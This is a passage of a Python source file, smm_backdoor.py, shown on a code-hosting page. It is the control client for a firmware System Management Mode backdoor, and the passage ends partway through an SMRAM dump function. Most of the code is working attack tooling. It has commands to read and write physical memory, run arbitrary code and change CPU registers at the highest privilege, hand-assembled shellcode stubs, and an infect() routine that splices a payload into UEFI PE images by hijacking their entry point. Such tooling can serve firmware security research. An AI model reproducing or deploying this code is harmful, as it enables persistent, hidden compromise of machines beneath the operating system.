-
Notifications
You must be signed in to change notification settings - Fork 51
/
Copy pathsmm_backdoor.py
1670 lines (1005 loc) · 42.7 KB
/
smm_backdoor.py
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
56
57
58
59
60
61
62
63
64
65
66
67
68
69
70
71
72
73
74
75
76
77
78
79
80
81
82
83
84
85
86
87
88
89
90
91
92
93
94
95
96
97
98
99
100
101
102
103
104
105
106
107
108
109
110
111
112
113
114
115
116
117
118
119
120
121
122
123
124
125
126
127
128
129
130
131
132
133
134
135
136
137
138
139
140
141
142
143
144
145
146
147
148
149
150
151
152
153
154
155
156
157
158
159
160
161
162
163
164
165
166
167
168
169
170
171
172
173
174
175
176
177
178
179
180
181
182
183
184
185
186
187
188
189
190
191
192
193
194
195
196
197
198
199
200
201
202
203
204
205
206
207
208
209
210
211
212
213
214
215
216
217
218
219
220
221
222
223
224
225
226
227
228
229
230
231
232
233
234
235
236
237
238
239
240
241
242
243
244
245
246
247
248
249
250
251
252
253
254
255
256
257
258
259
260
261
262
263
264
265
266
267
268
269
270
271
272
273
274
275
276
277
278
279
280
281
282
283
284
285
286
287
288
289
290
291
292
293
294
295
296
297
298
299
300
301
302
303
304
305
306
307
308
309
310
311
312
313
314
315
316
317
318
319
320
321
322
323
324
325
326
327
328
329
330
331
332
333
334
335
336
337
338
339
340
341
342
343
344
345
346
347
348
349
350
351
352
353
354
355
356
357
358
359
360
361
362
363
364
365
366
367
368
369
370
371
372
373
374
375
376
377
378
379
380
381
382
383
384
385
386
387
388
389
390
391
392
393
394
395
396
397
398
399
400
401
402
403
404
405
406
407
408
409
410
411
412
413
414
415
416
417
418
419
420
421
422
423
424
425
426
427
428
429
430
431
432
433
434
435
436
437
438
439
440
441
442
443
444
445
446
447
448
449
450
451
452
453
454
455
456
457
458
459
460
461
462
463
464
465
466
467
468
469
470
471
472
473
474
475
476
477
478
479
480
481
482
483
484
485
486
487
488
489
490
491
492
493
494
495
496
497
498
499
500
501
502
503
504
505
506
507
508
509
510
511
512
513
514
515
516
517
518
519
520
521
522
523
524
525
526
527
528
529
530
531
532
533
534
535
536
537
538
539
540
541
542
543
544
545
546
547
548
549
550
551
552
553
554
555
556
557
558
559
560
561
562
563
564
565
566
567
568
569
570
571
572
573
574
575
576
577
578
579
580
581
582
583
584
585
586
587
588
589
590
591
592
593
594
595
596
597
598
599
600
601
602
603
604
605
606
607
608
609
610
611
612
613
614
615
616
617
618
619
620
621
622
623
624
625
626
627
628
629
630
631
632
633
634
635
636
637
638
639
640
641
642
643
644
645
646
647
648
649
650
651
652
653
654
655
656
657
658
659
660
661
662
663
664
665
666
667
668
669
670
671
672
673
674
675
676
677
678
679
680
681
682
683
684
685
686
687
688
689
690
691
692
693
694
695
696
697
698
699
700
701
702
703
704
705
706
707
708
709
710
711
712
713
714
715
716
717
718
719
720
721
722
723
724
725
726
727
728
729
730
731
732
733
734
735
736
737
738
739
740
741
742
743
744
745
746
747
748
749
750
751
752
753
754
755
756
757
758
759
760
761
762
763
764
765
766
767
768
769
770
771
772
773
774
775
776
777
778
779
780
781
782
783
784
785
786
787
788
789
790
791
792
793
794
795
796
797
798
799
800
801
802
803
804
805
806
807
808
809
810
811
812
813
814
815
816
817
818
819
820
821
822
823
824
825
826
827
828
829
830
831
832
833
834
835
836
837
838
839
840
841
842
843
844
845
846
847
848
849
850
851
852
853
854
855
856
857
858
859
860
861
862
863
864
865
866
867
868
869
870
871
872
873
874
875
876
877
878
879
880
881
882
883
884
885
886
887
888
889
890
891
892
893
894
895
896
897
898
899
900
901
902
903
904
905
906
907
908
909
910
911
912
913
914
915
916
917
918
919
920
921
922
923
924
925
926
927
928
929
930
931
932
933
934
935
936
937
938
939
940
941
942
943
944
945
946
947
948
949
950
951
952
953
954
955
956
957
958
959
960
961
962
963
964
965
966
967
968
969
970
971
972
973
974
975
976
977
978
979
980
981
982
983
984
985
986
987
988
989
990
991
992
993
994
995
996
997
998
999
1000
#!/usr/bin/env python
import sys, os, platform, time, shutil, unittest, mmap, ctypes
from ctypes import *
from struct import pack, unpack, calcsize
from optparse import OptionParser, make_option
# SW SMI command value for communicating with backdoor SMM code
BACKDOOR_SW_SMI_VAL = 0xCC
#
# backdoor CTL commands
#
BACKDOOR_CTL_PING = 0x00 # check if backdoor is alive
BACKDOOR_CTL_INFO = 0x01 # return backdoor information
BACKDOOR_CTL_READ_PHYS = 0x02 # read physical memory
BACKDOOR_CTL_READ_VIRT = 0x03 # read virtual memory
BACKDOOR_CTL_WRITE_PHYS = 0x04 # write physical memory
BACKDOOR_CTL_WRITE_VIRT = 0x05 # write virtual memory
BACKDOOR_CTL_EXECUTE = 0x06 # execute code at given address
BACKDOOR_CTL_MSR_GET = 0x07 # get MSR value
BACKDOOR_CTL_MSR_SET = 0x08 # set MSR value
BACKDOOR_CTL_STATE_GET = 0x09 # get saved state register value
BACKDOOR_CTL_STATE_SET = 0x0a # set saved state register value
BACKDOOR_CTL_GET_PHYS_ADDR = 0x0b # translate virtual address to physical
BACKDOOR_CTL_TIMER_ENABLE = 0x0c # enable periodic timer software SMI
BACKDOOR_CTL_TIMER_DISABLE = 0x0d # disable periodic timer software SMI
BACKDOOR_CTL_FIND_VMCS = 0x0e # find potential VMCS region
#
# Magic register values to communicate with the backdoor using
# periodic timer software SMI handler
#
TIMER_R8_VAL = 0xfe4020d4e8fa6c4d
TIMER_R9_VAL = 0xd344171e43eafc19
# how many cycles to wait for the periodic timer software SMI
TIMER_RETRY = 0x400000000
#
# EFI_SMM_CPU_PROTOCOL save state register numbers
#
SMM_SAVE_STATE_GDTBASE = 4
SMM_SAVE_STATE_IDTBASE = 5
SMM_SAVE_STATE_LDTBASE = 6
SMM_SAVE_STATE_GDTLIMIT = 7
SMM_SAVE_STATE_IDTLIMIT = 8
SMM_SAVE_STATE_LDTLIMIT = 9
SMM_SAVE_STATE_LDTINFO = 10
SMM_SAVE_STATE_ES = 20
SMM_SAVE_STATE_CS = 21
SMM_SAVE_STATE_SS = 22
SMM_SAVE_STATE_DS = 23
SMM_SAVE_STATE_FS = 24
SMM_SAVE_STATE_GS = 25
SMM_SAVE_STATE_LDTR_SEL = 26
SMM_SAVE_STATE_TR_SEL = 27
SMM_SAVE_STATE_DR7 = 28
SMM_SAVE_STATE_DR6 = 29
SMM_SAVE_STATE_R8 = 30
SMM_SAVE_STATE_R9 = 31
SMM_SAVE_STATE_R10 = 32
SMM_SAVE_STATE_R11 = 33
SMM_SAVE_STATE_R12 = 34
SMM_SAVE_STATE_R13 = 35
SMM_SAVE_STATE_R14 = 36
SMM_SAVE_STATE_R15 = 37
SMM_SAVE_STATE_RAX = 38
SMM_SAVE_STATE_RBX = 39
SMM_SAVE_STATE_RCX = 40
SMM_SAVE_STATE_RDX = 41
SMM_SAVE_STATE_RSP = 42
SMM_SAVE_STATE_RBP = 43
SMM_SAVE_STATE_RSI = 44
SMM_SAVE_STATE_RDI = 45
SMM_SAVE_STATE_RIP = 46
SMM_SAVE_STATE_RFLAGS = 51
SMM_SAVE_STATE_CR0 = 52
SMM_SAVE_STATE_CR3 = 53
SMM_SAVE_STATE_CR4 = 54
# See struct _INFECTOR_CONFIG in SmmBackdoor.h
INFECTOR_CONFIG_SECTION = '.conf'
INFECTOR_CONFIG_FMT = 'QQQQQ'
INFECTOR_CONFIG_LEN = 8 + 8 + 8 + 8 + 8
# IMAGE_DOS_HEADER.e_res magic constant to mark infected file
INFECTOR_SIGN = 'INFECTED'
# EFI variable with debug output buffer address
BACKDOOR_VAR = 'SmmBackdoorInfo-0cacdf34-ee00-4230-af5d-8bae0072cbea'
PAGE_SHIFT = 12
PAGE_SIZE = 0x1000
PAGE_MASK = 0xfffffffffffff000
DEBUG_OUTPUT_SIZE = PAGE_SIZE * 0x10
PAGE_READWRITE = 0x04
PAGE_EXECUTE_READWRITE = 0x40
MEM_COMMIT = 0x1000
MEM_RESERVE = 0x2000
MEM_RELEASE = 0x8000
align_up = lambda x, a: ((x + a - 1) // a) * a
align_down = lambda x, a: (x // a) * a
is_win32 = lambda: sys.platform == 'win32'
cs = None
stub_addr = None
if is_win32():
# check for WoW64 in case of Windows
if platform.architecture()[0] != '64bit':
print('ERROR: WoW64 is not supported')
exit()
class Singleton(type):
_instances = {}
def __call__(self, *args, **kwargs):
if self not in self._instances:
# create new instance
self._instances[self] = super(Singleton, self).__call__(*args, **kwargs)
return self._instances[self]
class ChipsecWrapper(object):
__metaclass__ = Singleton
class NoSuchVariable(Exception):
pass
def __init__(self):
try:
import chipsec.chipset
import chipsec.hal.uefi
import chipsec.hal.physmem
import chipsec.hal.interrupts
except ImportError:
print('ERROR: chipsec is not installed')
exit(-1)
self.cs = chipsec.chipset.cs()
# load chipsec helper
self.cs.helper.start(True)
# load needed sumbmodules
self.intr = chipsec.hal.interrupts.Interrupts(self.cs)
self.uefi = chipsec.hal.uefi.UEFI(self.cs)
self.mem = chipsec.hal.physmem.Memory(self.cs)
def efi_var_get(self, var_name):
# parse variable name string of name-GUID format
name = var_name.split('-')
# get variable data
data = self.uefi.get_EFI_variable(name[0], '-'.join(name[1: ]), None)
if data is None or len(data) == 0:
raise(self.NoSuchVariable('Unable to query NVRAM variable %s' % var_name))
return data
efi_var_get_8 = lambda self, name: unpack('B', self.efi_var_get(name))[0]
efi_var_get_16 = lambda self, name: unpack('H', self.efi_var_get(name))[0]
efi_var_get_32 = lambda self, name: unpack('I', self.efi_var_get(name))[0]
efi_var_get_64 = lambda self, name: unpack('Q', self.efi_var_get(name))[0]
def mem_read(self, addr, size):
# read memory contents
return self.mem.read_physical_mem(addr, size)
def mem_write(self, addr, data):
# write memory contents
return self.mem.write_physical_mem(addr, len(data), data)
mem_read_8 = lambda self, addr: unpack('B', self.mem_read(addr, 1))[0]
mem_read_16 = lambda self, addr: unpack('H', self.mem_read(addr, 2))[0]
mem_read_32 = lambda self, addr: unpack('I', self.mem_read(addr, 4))[0]
mem_read_64 = lambda self, addr: unpack('Q', self.mem_read(addr, 8))[0]
mem_write_1 = lambda self, addr, v: self.mem_write(addr, pack('B', v))
mem_write_2 = lambda self, addr, v: self.mem_write(addr, pack('H', v))
mem_write_4 = lambda self, addr, v: self.mem_write(addr, pack('I', v))
mem_write_8 = lambda self, addr, v: self.mem_write(addr, pack('Q', v))
def send_sw_smi(self, code, data, rax = 0, rbx = 0, rcx = 0, rdx = 0, rsi = 0, rdi = 0):
# fire synchronous SMI
self.intr.send_SW_SMI(0, code, data, rax, rbx, rcx, rdx, rsi, rdi)
# class that inherits mmap.mmap and has the page address
class Mmap(mmap.mmap):
class PyObj(Structure):
_fields_ = [( 'ob_refcnt', c_size_t ),
( 'ob_type', c_void_p )]
# ctypes object for introspection
class PyMmap(PyObj):
_fields_ = [( 'ob_addr', c_size_t )]
def __init__(self, *args, **kwarg):
# get the page address by introspection of the native structure
self.mem = self.PyMmap.from_address(id(self))
self.old = None
if is_win32():
kernel32 = ctypes.windll.kernel32
# fix return type of VirtualAlloc()
kernel32.VirtualAlloc.restype = ctypes.c_void_p
# remeber original address
self.old = self.mem.ob_addr
# allocate reguler (not mapped) virtual memory
self.mem.ob_addr = kernel32.VirtualAlloc(0,
args[1],
MEM_COMMIT | MEM_RESERVE,
PAGE_READWRITE)
assert self.mem.ob_addr is not None
# get address of allocated memory
self.addr = self.mem.ob_addr
def close(self):
if self.old is not None:
# restore original address
self.mem.ob_addr = self.old
kernel32 = ctypes.windll.kernel32
# free allocated memory
kernel32.VirtualFree(ctypes.c_void_p(self.addr), 0, MEM_RELEASE)
super(Mmap, self).close()
def __del__(self):
# close mmap object to free allocated memory
self.close()
def mem_alloc(size):
if is_win32():
# on Windows mmap() has different arguments
return Mmap(-1, size, 'w')
else:
return Mmap(-1, size, mmap.PROT_WRITE)
class BackdoorControl(object):
# initial value for BACKDOOR_CTL.Status
STATUS_NONE = 0xffffffffffffffff
EFI_SUCCESS = 0
EFI_INVALID_PARAMETER = (1 << 63) | 2
EFI_NOT_FOUND = (1 << 63) | 14
EFI_NO_MAPPING = (1 << 63) | 17
class NoBackdoor(Exception):
pass
class BadArguments(Exception):
pass
class BadAddress(Exception):
pass
class BadVirtualAddress(Exception):
pass
class Info(object):
MAX_SMRAM_REGIONS = 0x10
def __init__(self, bd):
self.smram = []
# get basic information
self.cr0, self.cr3, self.smst = bd._ctl_get('QQQ')
for i in range(0, self.MAX_SMRAM_REGIONS):
# obtain BACKDOOR_SMRAM_REGION
addr, size = bd._ctl_get('QQ')
if addr == 0 or size == 0:
# end of the list
break
self.smram.append(( addr, size ))
def __init__(self, cs):
# allocate test memory pages
self.mem = mem_alloc(PAGE_SIZE)
self.stub_addr = None
self.cs = cs
def _setaffinity(self, mask):
if is_win32():
kernel32 = ctypes.windll.kernel32
CURRENT_THREAD = ctypes.c_void_p(-2)
# execute SetThreadAffinityMask()
kernel32.SetThreadAffinityMask(CURRENT_THREAD, mask);
else:
# load libc
libc = ctypes.cdll.LoadLibrary('libc.so.6')
mask = ctypes.c_ulong(mask)
# execute sched_setaffinity()
libc.sched_setaffinity(0, ctypes.sizeof(ctypes.c_ulong), ctypes.pointer(mask))
def _ctl_get(self, format, *args):
# read BACKDOOR_CTL structure contents
return unpack(format, self.mem.read(calcsize(format)))
def _ctl_set(self, format, *args):
self.mem.seek(0)
# write BACKDOOR_CTL structure contents
self.mem.write(pack(format, *args))
self.mem.write('\0' * (PAGE_SIZE - calcsize(format)))
self.mem.seek(0)
def _ctl_send_timer(self, ctl, arg):
#
# Construct the code to call SMM backdoor using
# periodic timer SW SMI
#
code = '\x51' # push rcx
code += '\x52' # push rdx
code += '\x57' # push rdi
code += '\x56' # push rsi
code += '\x41\x50' # push r8
code += '\x41\x51' # push r9
code += '\x48\xbf' + pack('Q', ctl) # mov rdi, ctl
code += '\x48\xbe' + pack('Q', arg) # mov rsi, arg
code += '\xe8\x00\x00\x00\x00' # call $+5
code += '\x59' # pop rcx
code += '\x48\x83\xc1\x23' # add rcx, 35
code += '\x48\xba' + pack('Q', TIMER_RETRY) # mov rdx, TIMER_RETRY
code += '\x49\xb8' + pack('Q', TIMER_R8_VAL) # mov r8, MAGIC_R8_VAL
code += '\x49\xb9' + pack('Q', TIMER_R9_VAL) # mov r9, MAGIC_R9_VAL
code += '\x48\xff\xca' # dec rdx
code += '\x74\x02' # jz $+4
code += '\xff\xe1' # jmp rcx
code += '\x41\x59' # pop r9
code += '\x41\x58' # pop r8
code += '\x5e' # pop rsi
code += '\x5f' # pop rdi
code += '\x5a' # pop rdx
code += '\x59' # pop rcx
code += '\xc3' # ret
if is_win32():
kernel32 = ctypes.windll.kernel32
# fix return type of VirtualAlloc()
kernel32.VirtualAlloc.restype = ctypes.c_void_p
# allocate executable memory page
stub_addr = kernel32.VirtualAlloc(0,
PAGE_SIZE,
MEM_COMMIT | MEM_RESERVE,
PAGE_EXECUTE_READWRITE)
assert stub_addr is not None
kernel32.RtlCopyMemory(ctypes.c_void_p(stub_addr),
ctypes.create_string_buffer(code), len(code))
else:
# allocate executable memory page
stub = Mmap(-1, PAGE_SIZE, prot = mmap.PROT_WRITE | mmap.PROT_EXEC,
flags = mmap.MAP_ANON | mmap.MAP_PRIVATE)
stub.write(code)
stub_addr = stub.addr
# execute current process only on 1-st CPU
self._setaffinity(1)
# pass execution to the generated code
func = ctypes.CFUNCTYPE(None)(stub_addr)
func()
if is_win32():
# free memory page
kernel32.VirtualFree(ctypes.c_void_p(stub_addr), 0, MEM_RELEASE)
def _ctl_send_smi(self, code, args):
# send backdoor control request
self.cs.send_sw_smi(BACKDOOR_SW_SMI_VAL, code, rcx = args)
def _ctl_send(self, code):
if self.cs is None:
# send backdoor control request using periodic timer
self._ctl_send_timer(code, self.mem.addr)
else:
# send backdoor control request using software SMI
self._ctl_send_smi(code, self.mem.addr)
status = self._ctl_get('Q')[0]
# check reply status
if status == self.STATUS_NONE:
raise(self.NoBackdoor('Backdoor is not present'))
return status
def ping(self):
# set input arguments
self._ctl_set('Q', self.STATUS_NONE)
# perform request
assert self._ctl_send(BACKDOOR_CTL_PING) == 0
def info(self):
# set input arguments
self._ctl_set('Q', self.STATUS_NONE)
# perform request
assert self._ctl_send(BACKDOOR_CTL_INFO) == 0
# read information
return self.Info(self)
def _check_mem_status(self, status):
if status == self.EFI_INVALID_PARAMETER:
# invalid arguments passed to the backdoor request
raise(self.BadArguments('Backdoor request bad arguments'))
elif status == self.EFI_NO_MAPPING:
# bad buffer address passed to the backdoor request
raise(self.BadAddress('Backdoor request bad buffer address'))
elif status == self.EFI_NOT_FOUND:
# bad target virtual address passed to the backdoor request
raise(self.BadVirtualAddress('Backdoor request bad virtual address'))
return status
def _write_mem(self, code, addr, data):
size = len(data)
assert size <= PAGE_SIZE and size > 0
assert (addr & PAGE_MASK) == ((addr + size - 1) & PAGE_MASK)
# allocate data buffer
buff = mem_alloc(PAGE_SIZE)
buff.write(data)
buff.write('\0' * (PAGE_SIZE - size))
# set input arguments
self._ctl_set('QQQQ', self.STATUS_NONE, addr, size, buff.addr)
# perform request
assert self._check_mem_status(self._ctl_send(code)) == self.EFI_SUCCESS
def _read_mem(self, code, addr, size):
assert size <= PAGE_SIZE and size > 0
assert (addr & PAGE_MASK) == ((addr + size - 1) & PAGE_MASK)
# allocate data buffer
buff = mem_alloc(PAGE_SIZE)
buff.write('\0' * PAGE_SIZE)
buff.seek(0)
# set input arguments
self._ctl_set('QQQQ', self.STATUS_NONE, addr, size, buff.addr)
# perform request
assert self._check_mem_status(self._ctl_send(code)) == self.EFI_SUCCESS
# get readed data
return buff.read(size)
def write_phys_mem(self, addr, data):
return self._write_mem(BACKDOOR_CTL_WRITE_PHYS, addr, data)
def read_phys_mem(self, addr, size):
return self._read_mem(BACKDOOR_CTL_READ_PHYS, addr, size)
def write_virt_mem(self, addr, data):
return self._write_mem(BACKDOOR_CTL_WRITE_VIRT, addr, data)
def read_virt_mem(self, addr, size):
return self._read_mem(BACKDOOR_CTL_READ_VIRT, addr, size)
def execute(self, addr):
# set input arguments
self._ctl_set('QQ', self.STATUS_NONE, addr)
# perform request
assert self._ctl_send(BACKDOOR_CTL_EXECUTE) == 0
def msr_get(self, reg):
# set input arguments
self._ctl_set('QQQ', self.STATUS_NONE, reg, 0)
# perform request
assert self._ctl_send(BACKDOOR_CTL_MSR_GET) == 0
_, val = self._ctl_get('QQ')
return val
def msr_set(self, reg, val):
# set input arguments
self._ctl_set('QQQ', self.STATUS_NONE, reg, val)
# perform request
assert self._ctl_send(BACKDOOR_CTL_MSR_SET) == 0
def state_get(self, reg):
# set input arguments
self._ctl_set('QQQ', self.STATUS_NONE, reg, 0)
# perform request
assert self._ctl_send(BACKDOOR_CTL_STATE_GET) == 0
_, val = self._ctl_get('QQ')
return val
def state_set(self, reg, val):
# set input arguments
self._ctl_set('QQQ', self.STATUS_NONE, reg, val)
# perform request
assert self._ctl_send(BACKDOOR_CTL_STATE_SET) == 0
def timer_enable(self):
# enable periodic timer SW SMI
self._ctl_send_smi(BACKDOOR_CTL_TIMER_ENABLE, 0)
def timer_disable(self):
# disable periodic timer SW SMI
self._ctl_send_smi(BACKDOOR_CTL_TIMER_DISABLE, 0)
def get_phys_addr(self, addr_virt, cr3 = 0, eptp = 0):
eptp = 1 if eptp is None else eptp
# set input arguments
self._ctl_set('QQQQQ', self.STATUS_NONE, addr_virt, 0, eptp, cr3)
# perform request
if self._ctl_send(BACKDOOR_CTL_GET_PHYS_ADDR) != 0:
# unable to translate virtual to physical
return None
_, addr_phys = self._ctl_get('QQ')
return addr_phys
def find_vmcs(self, addr, size = None):
# set input arguments
self._ctl_set('QQQQ', self.STATUS_NONE, addr, PAGE_SIZE if size is None else size, 0)
# perform request
if self._ctl_send(BACKDOOR_CTL_FIND_VMCS) != 0:
# unable to locate VMCS within specified memory region
return None
_, _, vmcs_addr = self._ctl_get('QQQ')
return vmcs_addr if vmcs_addr != 0 else None
def infect(src, payload, dst = None):
try:
import pefile
except ImportError:
print('ERROR: pefile is not installed')
exit(-1)
def _infector_config_offset(pe):
for section in pe.sections:
# find .conf section of payload image
if section.Name[: len(INFECTOR_CONFIG_SECTION)] == INFECTOR_CONFIG_SECTION:
return section.PointerToRawData
raise Exception('Unable to find %s section' % INFECTOR_CONFIG_SECTION)
def _infector_config_get(pe, data):
offs = _infector_config_offset(pe)
return unpack(INFECTOR_CONFIG_FMT, data[offs : offs + INFECTOR_CONFIG_LEN])
def _infector_config_set(pe, data, *args):
offs = _infector_config_offset(pe)
return data[: offs] + \
pack(INFECTOR_CONFIG_FMT, *args) + \
data[offs + INFECTOR_CONFIG_LEN :]
# load target image
pe_src = pefile.PE(src)
# load payload image
pe_payload = pefile.PE(payload)
if pe_src.DOS_HEADER.e_res == INFECTOR_SIGN:
raise Exception('%s is already infected' % src)
if pe_src.FILE_HEADER.Machine != pe_payload.FILE_HEADER.Machine:
raise Exception('Architecture missmatch')
# read payload image data into the string
data = open(payload, 'rb').read()
# read _INFECTOR_CONFIG, this structure is located at .conf section of payload image
val_1, val_2, val_3, conf_ep_new, conf_ep_old = _infector_config_get(pe_payload, data)
last_section = None
for section in pe_src.sections:
# find last section of target image
last_section = section
if last_section.Misc_VirtualSize > last_section.SizeOfRawData:
raise Exception('Last section virtual size must be less or equal than raw size')
# save original entry point address of target image
conf_ep_old = pe_src.OPTIONAL_HEADER.AddressOfEntryPoint
print('Original entry point RVA is 0x%.8x' % conf_ep_old )
print('Original %s virtual size is 0x%.8x' % \
(last_section.Name.split('\0')[0], last_section.Misc_VirtualSize))
print('Original image size is 0x%.8x' % pe_src.OPTIONAL_HEADER.SizeOfImage)
# write updated _INFECTOR_CONFIG back to the payload image
data = _infector_config_set(pe_payload, data, val_1, val_2, val_3, conf_ep_new, conf_ep_old)
# set new entry point of target image
pe_src.OPTIONAL_HEADER.AddressOfEntryPoint = \
last_section.VirtualAddress + last_section.SizeOfRawData + conf_ep_new
# update last section size
last_section.SizeOfRawData += len(data)
last_section.Misc_VirtualSize = last_section.SizeOfRawData
# make it executable
last_section.Characteristics = pefile.SECTION_CHARACTERISTICS['IMAGE_SCN_MEM_READ'] | \
pefile.SECTION_CHARACTERISTICS['IMAGE_SCN_MEM_WRITE'] | \
pefile.SECTION_CHARACTERISTICS['IMAGE_SCN_MEM_EXECUTE']
print('Characteristics of %s section was changed to RWX' % last_section.Name.split('\0')[0])
# update image headers
pe_src.OPTIONAL_HEADER.SizeOfImage = last_section.VirtualAddress + last_section.Misc_VirtualSize
pe_src.DOS_HEADER.e_res = INFECTOR_SIGN
print('New entry point RVA is 0x%.8x' % pe_src.OPTIONAL_HEADER.AddressOfEntryPoint)
print('New %s virtual size is 0x%.8x' % \
(last_section.Name.split('\0')[0], last_section.Misc_VirtualSize))
print('New image size is 0x%.8x' % pe_src.OPTIONAL_HEADER.SizeOfImage)
# get infected image data
data = pe_src.write() + data
if dst is not None:
with open(dst, 'wb') as fd:
# save infected image to the file
fd.write(data)
return data
def hexdump(data, width = 16, addr = 0):
ret = ''
def quoted(data):
# replace non-alphanumeric characters
return ''.join(map(lambda b: b if b.isalnum() else '.', data))
while data:
line = data[: width]
data = data[width :]
# put hex values
s = map(lambda b: '%.2x' % ord(b), line)
s += [ ' ' ] * (width - len(line))
# put ASCII values
s = '%s | %s' % (' '.join(s), quoted(line))
if addr is not None:
# put address
s = '%.8x: %s' % (addr, s)
addr += len(line)
ret += s + '\n'
return ret
def init(use_timer = False):
global cs
if cs is None and not use_timer:
# initialize chipsec
cs = ChipsecWrapper()
else:
cs = None
def backdoor_debug_print():
assert cs is not None
print('[+] Obtaining backdoor debug information...')
try:
# get debug messages buffer address
addr = cs.efi_var_get_64(BACKDOOR_VAR)
except cs.NoSuchVariable, e:
print('ERROR: ' + str(e))
return
print('[+] Debug output buffer physical address is 0x%x' % addr)
# read debug output
data = cs.mem_read(addr, DEBUG_OUTPUT_SIZE)
data = data.split('\0')[0]
num = 1
print('')
# print debug output to the console
for line in data.split('\r\n'):
line = line.strip()
if len(line) > 0:
print('%.8d - %s' % (num, line))
num += 1
print('')
def backdoor_debug_flush():
assert cs is not None
print('[+] Obtaining backdoor debug information...')
try:
# get debug messages buffer address
addr = cs.efi_var_get_64(BACKDOOR_VAR)
except cs.NoSuchVariable, e:
print('ERROR: ' + str(e))
return
print('[+] Debug output buffer physical address is 0x%x' % addr)
# erase debug output
cs.mem_write(addr, '\0' * DEBUG_OUTPUT_SIZE)
print('[+] Debug output buffer was erased')
def backdoor_test():
bd = BackdoorControl(cs)
print('[+] Checking if SMM backdoor is present...')
# check if backdoor is present
bd.ping()
print('[+] Obtaining information...')
# get backdoor info
info = bd.info()
print('')
print(' CR0 = 0x%x' % info.cr0)
print(' CR3 = 0x%x' % info.cr3)
print(' SMST = 0x%x' % info.smst)
print('')
if len(info.smram) > 0:
print('[+] SMRAM regions:\n')
for region_addr, region_size in info.smram:
print(' * 0x%.8x:%.8x' % (region_addr, region_addr + region_size - 1))
print('')
def execute(addr):
bd = BackdoorControl(cs)
# execute code at given address
bd.execute(addr)
def msr_get(reg):
bd = BackdoorControl(cs)
return bd.msr_get(reg)
def msr_set(reg, val):
bd = BackdoorControl(cs)
bd.msr_set(reg, val)
def state_get(reg):
bd = BackdoorControl(cs)
return bd.state_get(reg)
def state_set(reg, val):
bd = BackdoorControl(cs)
bd.state_set(reg, val)
def timer_enable():
bd = BackdoorControl(cs)
bd.timer_enable()
def timer_disable():
bd = BackdoorControl(cs)
bd.timer_disable()
def get_phys_addr(addr_virt, cr3 = 0, eptp = 0):
bd = BackdoorControl(cs)
return bd.get_phys_addr(addr_virt, cr3 = cr3, eptp = eptp)
def find_vmcs(addr, size = None):
bd = BackdoorControl(cs)
return bd.find_vmcs(addr, size = size)
def smram_info():
bd = BackdoorControl(cs)
# get backdoor information
info = bd.info()
# return SMRAM regions list
return info.smram
def ping():
bd = BackdoorControl(cs)
# check if backdoor is present
bd.ping()
def smram_dump():
bd = BackdoorControl(cs)
# get SMRAM information
regions, contents = smram_info(), []
regions_merged = []